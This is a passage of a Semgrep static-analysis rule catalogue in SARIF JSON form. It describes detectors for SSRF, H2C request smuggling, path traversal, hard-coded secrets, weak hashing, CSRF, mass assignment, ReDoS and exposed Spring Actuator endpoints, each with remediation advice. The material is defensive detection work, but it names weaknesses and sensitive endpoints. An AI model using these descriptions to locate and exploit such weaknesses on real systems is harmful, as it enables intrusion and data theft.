CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: yaml.kubernetes.security.hostnetwork-pod.hostnetwork-pod"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"If unverified user data can reach the `wkhtmltopdf` it can result in Server-Side Request Forgery vulnerabilities"},"help":{"markdown":"If unverified user data can reach the `wkhtmltopdf` it can result in Server-Side Request Forgery vulnerabilities\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.wkhtmltopdf.security.audit.wkhtmltopdf-injection.wkhtmltopdf-injection)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"If unverified user data can reach the `wkhtmltopdf` it can result in Server-Side Request Forgery vulnerabilities"},"helpUri":"https://semgrep.dev/r/javascript.wkhtmltopdf.security.audit.wkhtmltopdf-injection.wkhtmltopdf-injection","id":"javascript.wkhtmltopdf.security.audit.wkhtmltopdf-injection.wkhtmltopdf-injection","name":"javascript.wkhtmltopdf.security.audit.wkhtmltopdf-injection.wkhtmltopdf-injection","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","LOW CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.wkhtmltopdf.security.audit.wkhtmltopdf-injection.wkhtmltopdf-injection"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.net.tainted-django-http-request-paramiko.tainted-django-http-request-paramiko)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/python.django.net.tainted-django-http-request-paramiko.tainted-django-http-request-paramiko","id":"python.django.net.tainted-django-http-request-paramiko.tainted-django-http-request-paramiko","name":"python.django.net.tainted-django-http-request-paramiko.tainted-django-http-request-paramiko","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.net.tainted-django-http-request-paramiko.tainted-django-http-request-paramiko"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Conditions for Nginx H2C smuggling identified. H2C smuggling allows upgrading HTTP/1.1 connections to lesser-known HTTP/2 over cleartext (h2c) connections which can allow a bypass of reverse proxy access controls, and lead to long-lived, unrestricted HTTP traffic directly to back-end servers. To mitigate: WebSocket support required: Allow only the value websocket for HTTP/1.1 upgrade headers (e.g., Upgrade: websocket). WebSocket support not required: Do not forward Upgrade headers."},"help":{"markdown":"Conditions for Nginx H2C smuggling identified. H2C smuggling allows upgrading HTTP/1.1 connections to lesser-known HTTP/2 over cleartext (h2c) connections which can allow a bypass of reverse proxy access controls, and lead to long-lived, unrestricted HTTP traffic directly to back-end servers. To mitigate: WebSocket support required: Allow only the value websocket for HTTP/1.1 upgrade headers (e.g., Upgrade: websocket). WebSocket support not required: Do not forward Upgrade headers.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.nginx.security.possible-h2c-smuggling.possible-nginx-h2c-smuggling)\n - [https://labs.bishopfox.com/tech-blog/h2c-smuggling-request-smuggling-via-http/2-cleartext-h2c](https://labs.bishopfox.com/tech-blog/h2c-smuggling-request-smuggling-via-http/2-cleartext-h2c)\n","text":"Conditions for Nginx H2C smuggling identified. H2C smuggling allows upgrading HTTP/1.1 connections to lesser-known HTTP/2 over cleartext (h2c) connections which can allow a bypass of reverse proxy access controls, and lead to long-lived, unrestricted HTTP traffic directly to back-end servers. To mitigate: WebSocket support required: Allow only the value websocket for HTTP/1.1 upgrade headers (e.g., Upgrade: websocket). WebSocket support not required: Do not forward Upgrade headers."},"helpUri":"https://semgrep.dev/r/generic.nginx.security.possible-h2c-smuggling.possible-nginx-h2c-smuggling","id":"generic.nginx.security.possible-h2c-smuggling.possible-nginx-h2c-smuggling","name":"generic.nginx.security.possible-h2c-smuggling.possible-nginx-h2c-smuggling","properties":{"precision":"very-high","tags":["CWE-444: Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')","MEDIUM CONFIDENCE","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: generic.nginx.security.possible-h2c-smuggling.possible-nginx-h2c-smuggling"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"This hashing algorithm is insecure. If this hash is used in a security context, such as password hashing, it should be converted to a stronger hashing algorithm."},"help":{"markdown":"This hashing algorithm is insecure. If this hash is used in a security context, such as password hashing, it should be converted to a stronger hashing algorithm.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.crypto.insecure-hash.insecure-hash)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"This hashing algorithm is insecure. If this hash is used in a security context, such as password hashing, it should be converted to a stronger hashing algorithm."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.crypto.insecure-hash.insecure-hash","id":"cpp.lang.security.crypto.insecure-hash.insecure-hash","name":"cpp.lang.security.crypto.insecure-hash.insecure-hash","properties":{"precision":"very-high","tags":["CWE-328: Use of Weak Hash","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.crypto.insecure-hash.insecure-hash"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A hard-coded credential was detected. It is not recommended to store credentials in source-code, as this risks secrets being leaked and used by either an internal or external malicious adversary. It is recommended to use environment variables to securely provide credentials or retrieve credentials from a secure vault or HSM (Hardware Security Module)."},"help":{"markdown":"A hard-coded credential was detected. It is not recommended to store credentials in source-code, as this risks secrets being leaked and used by either an internal or external malicious adversary. It is recommended to use environment variables to securely provide credentials or retrieve credentials from a secure vault or HSM (Hardware Security Module).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.security.express-jwt-hardcoded-secret.express-jwt-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A hard-coded credential was detected. It is not recommended to store credentials in source-code, as this risks secrets being leaked and used by either an internal or external malicious adversary. It is recommended to use environment variables to securely provide credentials or retrieve credentials from a secure vault or HSM (Hardware Security Module)."},"helpUri":"https://semgrep.dev/r/javascript.express.security.express-jwt-hardcoded-secret.express-jwt-hardcoded-secret","id":"javascript.express.security.express-jwt-hardcoded-secret.express-jwt-hardcoded-secret","name":"javascript.express.security.express-jwt-hardcoded-secret.express-jwt-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.security.express-jwt-hardcoded-secret.express-jwt-hardcoded-secret"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Detected a cookie options with the `SameSite` flag set to \"None\". This is a potential security risk that arises from the way web browsers manage cookies. In a typical web application, cookies are used to store and transmit session-related data between a client and a server. To enhance security, cookies can be marked with the \"SameSite\" attribute, which restricts their usage based on the origin of the page that set them. This attribute can have three values: \"Strict,\" \"Lax,\" or \"None\". If this wasn't intentional, it's recommended to set the the `SameSite` attribute of the important cookies (e.g., session cookie) to either `Strict` or `Lax`. When `SameSite` is set to \"Strict\", no 3rd party cookie will be sent with outgoing requests, this is the most secure and private setting but harder to deploy with good usability. Setting it to \"Lax\" is the minimum requirement. You can use the Cookie Policy Middleware to globally set the `SameSite` attribute. You can then use the CookieOptions class when instantiating the cookie, which inherits these settings and will require future developers to have to explicitly override them on a case-by-case basis if needed. This approach ensures cookies are secure by default."},"help":{"markdown":"Detected a cookie options with the `SameSite` flag set to \"None\". This is a potential security risk that arises from the way web browsers manage cookies. In a typical web application, cookies are used to store and transmit session-related data between a client and a server. To enhance security, cookies can be marked with the \"SameSite\" attribute, which restricts their usage based on the origin of the page that set them. This attribute can have three values: \"Strict,\" \"Lax,\" or \"None\". If this wasn't intentional, it's recommended to set the the `SameSite` attribute of the important cookies (e.g., session cookie) to either `Strict` or `Lax`. When `SameSite` is set to \"Strict\", no 3rd party cookie will be sent with outgoing requests, this is the most secure and private setting but harder to deploy with good usability. Setting it to \"Lax\" is the minimum requirement. You can use the Cookie Policy Middleware to globally set the `SameSite` attribute. You can then use the CookieOptions class when instantiating the cookie, which inherits these settings and will require future developers to have to explicitly override them on a case-by-case basis if needed. This approach ensures cookies are secure by default.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet-core.cookies.cookie-samesite-none.cookie-samesite-none)\n - [https://learn.microsoft.com/en-us/aspnet/core/security/authentication/cookie?view=aspnetcore-8.0#cookie-policy-middleware](https://learn.microsoft.com/en-us/aspnet/core/security/authentication/cookie?view=aspnetcore-8.0#cookie-policy-middleware)\n - [https://learn.microsoft.com/en-us/dotnet/api/microsoft.aspnetcore.http.cookieoptions](https://learn.microsoft.com/en-us/dotnet/api/microsoft.aspnetcore.http.cookieoptions)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://web.dev/articles/samesite-cookies-explained](https://web.dev/articles/samesite-cookies-explained)\n","text":"Detected a cookie options with the `SameSite` flag set to \"None\". This is a potential security risk that arises from the way web browsers manage cookies. In a typical web application, cookies are used to store and transmit session-related data between a client and a server. To enhance security, cookies can be marked with the \"SameSite\" attribute, which restricts their usage based on the origin of the page that set them. This attribute can have three values: \"Strict,\" \"Lax,\" or \"None\". If this wasn't intentional, it's recommended to set the the `SameSite` attribute of the important cookies (e.g., session cookie) to either `Strict` or `Lax`. When `SameSite` is set to \"Strict\", no 3rd party cookie will be sent with outgoing requests, this is the most secure and private setting but harder to deploy with good usability. Setting it to \"Lax\" is the minimum requirement. You can use the Cookie Policy Middleware to globally set the `SameSite` attribute. You can then use the CookieOptions class when instantiating the cookie, which inherits these settings and will require future developers to have to explicitly override them on a case-by-case basis if needed. This approach ensures cookies are secure by default."},"helpUri":"https://semgrep.dev/r/csharp.dotnet-core.cookies.cookie-samesite-none.cookie-samesite-none","id":"csharp.dotnet-core.cookies.cookie-samesite-none.cookie-samesite-none","name":"csharp.dotnet-core.cookies.cookie-samesite-none.cookie-samesite-none","properties":{"precision":"very-high","tags":["CWE-1275: Sensitive Cookie with Improper SameSite Attribute","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet-core.cookies.cookie-samesite-none.cookie-samesite-none"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"String argument $A is used to read or write data from a file via Path.Combine without direct sanitization via Path.GetFileName. If the path is user-supplied data this can lead to path traversal."},"help":{"markdown":"String argument $A is used to read or write data from a file via Path.Combine without direct sanitization via Path.GetFileName. If the path is user-supplied data this can lead to path traversal.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.lang.security.filesystem.unsafe-path-combine.unsafe-path-combine)\n - [https://www.praetorian.com/blog/pathcombine-security-issues-in-aspnet-applications/](https://www.praetorian.com/blog/pathcombine-security-issues-in-aspnet-applications/)\n - [https://docs.microsoft.com/en-us/dotnet/api/system.io.path.combine?view=net-6.0#remarks](https://docs.microsoft.com/en-us/dotnet/api/system.io.path.combine?view=net-6.0#remarks)\n","text":"String argument $A is used to read or write data from a file via Path.Combine without direct sanitization via Path.GetFileName. If the path is user-supplied data this can lead to path traversal."},"helpUri":"https://semgrep.dev/r/csharp.lang.security.filesystem.unsafe-path-combine.unsafe-path-combine","id":"csharp.lang.security.filesystem.unsafe-path-combine.unsafe-path-combine","name":"csharp.lang.security.filesystem.unsafe-path-combine.unsafe-path-combine","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.lang.security.filesystem.unsafe-path-combine.unsafe-path-combine"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.pg.ruby-pg-hardcoded-secret.ruby-pg-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/ruby.pg.ruby-pg-hardcoded-secret.ruby-pg-hardcoded-secret","id":"ruby.pg.ruby-pg-hardcoded-secret.ruby-pg-hardcoded-secret","name":"ruby.pg.ruby-pg-hardcoded-secret.ruby-pg-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.pg.ruby-pg-hardcoded-secret.ruby-pg-hardcoded-secret"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.file.tainted-path-traversal-toml-fastapi.tainted-path-traversal-toml-fastapi)\n - [https://fastapi.palletsprojects.com/en/2.3.x/patterns/fileuploads/](https://fastapi.palletsprojects.com/en/2.3.x/patterns/fileuploads/)\n - [https://fastapi.tiangolo.com/tutorial/path-params/#path-parameters-containing-paths](https://fastapi.tiangolo.com/tutorial/path-params/#path-parameters-containing-paths)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n - [https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename](https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames."},"helpUri":"https://semgrep.dev/r/python.fastapi.file.tainted-path-traversal-toml-fastapi.tainted-path-traversal-toml-fastapi","id":"python.fastapi.file.tainted-path-traversal-toml-fastapi.tainted-path-traversal-toml-fastapi","name":"python.fastapi.file.tainted-path-traversal-toml-fastapi.tainted-path-traversal-toml-fastapi","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.file.tainted-path-traversal-toml-fastapi.tainted-path-traversal-toml-fastapi"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Use $FORM.cleaned_data[] instead of request.POST[] after form.is_valid() has been executed to only access sanitized data"},"help":{"markdown":"Use $FORM.cleaned_data[] instead of request.POST[] after form.is_valid() has been executed to only access sanitized data\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.security.django-using-request-post-after-is-valid.django-using-request-post-after-is-valid)\n - [https://docs.djangoproject.com/en/4.2/ref/forms/api/#accessing-clean-data](https://docs.djangoproject.com/en/4.2/ref/forms/api/#accessing-clean-data)\n","text":"Use $FORM.cleaned_data[] instead of request.POST[] after form.is_valid() has been executed to only access sanitized data"},"helpUri":"https://semgrep.dev/r/python.django.security.django-using-request-post-after-is-valid.django-using-request-post-after-is-valid","id":"python.django.security.django-using-request-post-after-is-valid.django-using-request-post-after-is-valid","name":"python.django.security.django-using-request-post-after-is-valid.django-using-request-post-after-is-valid","properties":{"precision":"very-high","tags":["CWE-20: Improper Input Validation","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.security.django-using-request-post-after-is-valid.django-using-request-post-after-is-valid"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"A CSRF middleware was not detected in your express application. Ensure you are either using one such as `csurf` or `csrf` (see rule references) and/or you are properly doing CSRF validation in your routes with a token or cookies."},"help":{"markdown":"A CSRF middleware was not detected in your express application. Ensure you are either using one such as `csurf` or `csrf` (see rule references) and/or you are properly doing CSRF validation in your routes with a token or cookies.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.security.audit.express-check-csurf-middleware-usage.express-check-csurf-middleware-usage)\n - [https://www.npmjs.com/package/csurf](https://www.npmjs.com/package/csurf)\n - [https://www.npmjs.com/package/csrf](https://www.npmjs.com/package/csrf)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html)\n","text":"A CSRF middleware was not detected in your express application. Ensure you are either using one such as `csurf` or `csrf` (see rule references) and/or you are properly doing CSRF validation in your routes with a token or cookies."},"helpUri":"https://semgrep.dev/r/javascript.express.security.audit.express-check-csurf-middleware-usage.express-check-csurf-middleware-usage","id":"javascript.express.security.audit.express-check-csurf-middleware-usage.express-check-csurf-middleware-usage","name":"javascript.express.security.audit.express-check-csurf-middleware-usage.express-check-csurf-middleware-usage","properties":{"precision":"very-high","tags":["CWE-352: Cross-Site Request Forgery (CSRF)","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.security.audit.express-check-csurf-middleware-usage.express-check-csurf-middleware-usage"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Checks for calls to without_protection during mass assignment (which allows record creation from hash values). This can lead to users bypassing permissions protections. For Rails 4 and higher, mass protection is on by default. Fix: Don't use :without_protection => true. Instead, configure attr_accessible to control attribute access."},"help":{"markdown":"Checks for calls to without_protection during mass assignment (which allows record creation from hash values). This can lead to users bypassing permissions protections. For Rails 4 and higher, mass protection is on by default. Fix: Don't use :without_protection => true. Instead, configure attr_accessible to control attribute access.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.lang.security.unprotected-mass-assign.mass-assignment-vuln)\n - [https://github.com/presidentbeef/brakeman/blob/main/lib/brakeman/checks/check_without_protection.rb](https://github.com/presidentbeef/brakeman/blob/main/lib/brakeman/checks/check_without_protection.rb)\n - [https://www.acunetix.com/vulnerabilities/web/rails-mass-assignment/](https://www.acunetix.com/vulnerabilities/web/rails-mass-assignment/)\n","text":"Checks for calls to without_protection during mass assignment (which allows record creation from hash values). This can lead to users bypassing permissions protections. For Rails 4 and higher, mass protection is on by default. Fix: Don't use :without_protection => true. Instead, configure attr_accessible to control attribute access."},"helpUri":"https://semgrep.dev/r/ruby.lang.security.unprotected-mass-assign.mass-assignment-vuln","id":"ruby.lang.security.unprotected-mass-assign.mass-assignment-vuln","name":"ruby.lang.security.unprotected-mass-assign.mass-assignment-vuln","properties":{"precision":"very-high","tags":["CWE-915: Improperly Controlled Modification of Dynamically-Determined Object Attributes","LOW CONFIDENCE","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.lang.security.unprotected-mass-assign.mass-assignment-vuln"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"RegExp() called with a `$ARG` function argument, this might allow an attacker to cause a Regular Expression Denial-of-Service (ReDoS) within your application as RegExP blocks the main thread. For this reason, it is recommended to use hardcoded regexes instead. If your regex is run on user-controlled input, consider performing input validation or use a regex checking/sanitization library such as https://www.npmjs.com/package/recheck to verify that the regex does not appear vulnerable to ReDoS."},"help":{"markdown":"RegExp() called with a `$ARG` function argument, this might allow an attacker to cause a Regular Expression Denial-of-Service (ReDoS) within your application as RegExP blocks the main thread. For this reason, it is recommended to use hardcoded regexes instead. If your regex is run on user-controlled input, consider performing input validation or use a regex checking/sanitization library such as https://www.npmjs.com/package/recheck to verify that the regex does not appear vulnerable to ReDoS.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.lang.security.audit.detect-non-literal-regexp.detect-non-literal-regexp)\n - [https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)\n","text":"RegExp() called with a `$ARG` function argument, this might allow an attacker to cause a Regular Expression Denial-of-Service (ReDoS) within your application as RegExP blocks the main thread. For this reason, it is recommended to use hardcoded regexes instead. If your regex is run on user-controlled input, consider performing input validation or use a regex checking/sanitization library such as https://www.npmjs.com/package/recheck to verify that the regex does not appear vulnerable to ReDoS."},"helpUri":"https://semgrep.dev/r/javascript.lang.security.audit.detect-non-literal-regexp.detect-non-literal-regexp","id":"javascript.lang.security.audit.detect-non-literal-regexp.detect-non-literal-regexp","name":"javascript.lang.security.audit.detect-non-literal-regexp.detect-non-literal-regexp","properties":{"precision":"very-high","tags":["CWE-1333: Inefficient Regular Expression Complexity","LOW CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","OWASP-A06:2017 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.lang.security.audit.detect-non-literal-regexp.detect-non-literal-regexp"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Spring Boot Actuator is fully enabled. This exposes sensitive endpoints such as /actuator/env, /actuator/logfile, /actuator/heapdump and others. Unless you have Spring Security enabled or another means to protect these endpoints, this functionality is available without authentication, causing a significant security risk."},"help":{"markdown":"Spring Boot Actuator is fully enabled. This exposes sensitive endpoints such as /actuator/env, /actuator/logfile, /actuator/heapdump and others. Unless you have Spring Security enabled or another means to protect these endpoints, this functionality is available without authentication, causing a significant security risk.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.spring.security.audit.spring-actuator-fully-enabled.spring-actuator-fully-enabled)\n - [https://docs.spring.io/spring-boot/docs/current/reference/html/production-ready-features.html#production-ready-endpoints-exposing-endpoints](https://docs.spring.io/spring-boot/docs/current/reference/html/production-ready-features.html#production-ready-endpoints-exposing-endpoints)\n - [https://medium.com/walmartglobaltech/perils-of-spring-boot-actuators-misconfiguration-185c43a0f785](https://medium.com/walmartglobaltech/perils-of-spring-boot-actuators-misconfiguration-185c43a0f785)\n - [https://blog.maass.xyz/spring-actuator-security-part-1-stealing-secrets-using-spring-actuators](https://blog.maass.xyz/spring-actuator-security-part-1-stealing-secrets-using-spring-actuators)\n","text":"Spring Boot Actuator is fully enabled. This exposes sensitive endpoints such as /actuator/env, /actuator/logfile, /actuator/heapdump and others. Unless you have Spring Security enabled or another means to protect these endpoints, this functionality is available without authentication, causing a significant security risk."},"helpUri":"https://semgrep.dev/r/java.spring.security.audit.spring-actuator-fully-enabled.spring-actuator-fully-enabled","id":"java.spring.security.audit.spring-actuator-fully-enabled.spring-actuator-fully-enabled","name":"java.spring.security.audit.spring-actuator-fully-enabled.spring-actuator-fully-enabled","properties":{"precision":"very-high","tags":["CWE-200: Exposure of Sensitive Information to an Unauthorized Actor","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: java.spring.security.audit.spring-actuator-fully-enabled.spring-actuator-fully-enabled"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a potentially dynamic ClientTrace. This occurred because semgrep could not find a static definition for '$TRACE'. Dynamic ClientTraces are dangerous because they deserialize function code to run when certain Request events occur, which could lead to code being run without your knowledge. Ensure that your ClientTrace is statically defined."},"help":{"markdown":"Detected a potentially dynamic ClientTrace. This occurred because semgrep could not find a static definition for '$TRACE'. Dynamic ClientTraces are dangerous because they deserialize function code to run when certain Request events occur, which could lead to code being run without your knowledge. Ensure that your ClientTrace is statically defined.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.lang.security.audit.net.dynamic-httptrace-clienttrace.dynamic-httptrace-clienttrace)\n - [https://github.com/returntocorp/semgrep-rules/issues/518](https://github.com/returntocorp/semgrep-rules/issues/518)\n","text":"Detected a potentially dynamic ClientTrace. This occurred because semgrep could not find a static definition for '$TRACE'. Dynamic ClientTraces are dangerous because they deserialize function code to run when certain Request events occur, which could lead to code being run without your knowledge. Ensure that your ClientTrace is statically defined."},"helpUri":"https://semgrep.dev/r/go.lang.security.audit.net.dynamic-httptrace-clienttrace.dynamic-httptrace-clienttrace","id":"go.lang.security.audit.net.dynamic-httptrace-clienttrace.dynamic-httptrace-clienttrace","name":"go.lang.security.audit.net.dynamic-httptrace-clienttrace.dynamic-httptrace-clienttrace","properties":{"precision":"very-high","tags":["CWE-913: Improper Control of Dynamically-Managed Code Resources","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: go.lang.security.audit.net.dynamic-httptrace-clienttrace.dynamic-httptrace-clienttrace"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The AWS CloudWatch Log Group has no retention. Missing retention in log groups can cause losing important event information."},"help":{"markdown":"The AWS CloudWatch Log Group has no retention. Missing retention in log groups can cause losing important event information.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-cloudwatch-log-group-no-retention.aws-cloudwatch-log-group-no-retention)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"The AWS CloudWatch Log Group has no retention. Missing retention in log groups can cause losing important event information."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-cloudwatch-log-group-no-retention.aws-cloudwatch-log-group-no-retention","id":"terraform.aws.security.aws-cloudwatch-log-group-no-retention.aws-cloudwatch-log-group-no-retention","name":"terraform.aws.security.aws-cloudwatch-log-group-no-retention.aws-cloudwatch-log-group-no-retention","properties":{"precision":"very-high","tags":["CWE-320: CWE CATEGORY: Key Management Errors","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-cloudwatch-log-group-no-retention.aws-cloudwatch-log-group-no-retention"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The AWS Workspace user volume is unencrypted. The AWS KMS encryption key protects user volume. To create your own, create a aws_kms_key resource or use the ARN string of a key in your account."},"help":{"markdown":"The AWS Workspace user volume is 